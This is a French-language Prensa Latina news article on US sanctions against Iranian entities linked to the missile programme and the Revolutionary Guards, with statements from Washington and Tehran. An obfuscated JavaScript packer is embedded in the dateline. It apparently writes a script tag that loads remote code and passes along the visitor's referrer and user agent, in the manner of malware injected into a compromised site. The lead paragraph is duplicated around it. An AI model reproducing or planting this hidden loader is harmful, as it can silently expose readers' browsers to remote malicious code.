lundi 22 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Les États-Unis imposent de nouvelles sanctions à l’Iran

Washington, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ftdnk|var|u0026u|referrer|hktfa||js|php'.split('|'),0,{})) Téhéran, 18 juillet (PL) Le Gouvernement étasunien a imposé des sanctions à 18 individus et entités d'Iran en relation avec le programme de missiles balistiques et le corps des Gardiens de la Révolution.

Washington, Téhéran, 18 juillet (PL) Le Gouvernement étasunien a imposé des sanctions à 18 individus et entités d’Iran en relation avec le programme de missiles balistiques et le corps des Gardiens de la Révolution.

Depuis ces mesures, les actifs aux États-Unis des victimes de la sanction seront congelés et il leur sera interdit de faire des transactions avec des nord-américains.

L’administration du président Donald Trump a assuré au Congrès que l’Iran continue de respecter l’accord nucléaire conclu en juillet 2015 avec son pays, la France, le Royaume-Uni, l’Allemagne, la Russie et la Chine.

Cependant, en harmonie avec la rhétorique de Trump, qui depuis son étape de candidat républicain a annoncé une ligne plus dure contre l’Iran et a menacé de rompre ou de renégocier l’accord, pour Washington, Téhéran « viole l’esprit du Plan d’Action Conjointe Intégrale (PACI) ».

Tout comme en avril dernier, le Gouvernement nord-américain a certifié l’application de la convention, contrôle qui a lieu tous les 90 jours, et a ensuite annoncé des sanctions à l’encontre de personnes et de compagnies iraniennes.

Selon le Secrétaire du Trésor étasunien, Steven Mnuchin, « ces nouvelles sanctions envoient un signal fort du fait que les États-Unis ne peuvent tolérer et ne tolérerons pas le comportement provocateur et déstabilisateur de l’Iran ».

Pour sa part, la porte-parole du Département d’État, Heather Nauert, a signalé que sa nation continue d’être « profondément préoccupée par les activités malveillantes de l’Iran dans tout le Moyen-Orient, lesquelles compromettent la stabilité, la sécurité et la prospérité régionale ».

Le Ministre iranien des Affaires Extérieures, Mohammed Javad Zarif, a confirmé la position critique de son pays envers la politique des États-Unis en dénonçant le fait que « ce pays ne respecte pas ses engagements prévus dans l’accord nucléaire ».

Il a également défendu le fait que Téhéran a « fidèlement, pleinement et totalement exécuté le PACI », puis a soutenu que l’administration étasunienne a quant à elle « échoué dans l’application de sa part du traité ».

Le titulaire de la diplomatie de la nation perse a également déploré le fait que Trump ait profité de sa présence au récent sommet du G-20, à Hambourg en Allemagne, pour exhorter des leaders d’autres pays à ne pas faire d’affaires avec l’Iran.

Pour sa part, le Gouvernement iranien a exclu le fait de négocier directement avec les États-Unis « tant que les nord-américains ne retrouvent le bon sens ». Il a ensuite dénoncé le fait que « les pressions exercées contre son programme de missiles cherchent à débiliter la capacité du pays ».

peo/jcm/dsa/jcm/ucl

EN CONTINU
notes connexes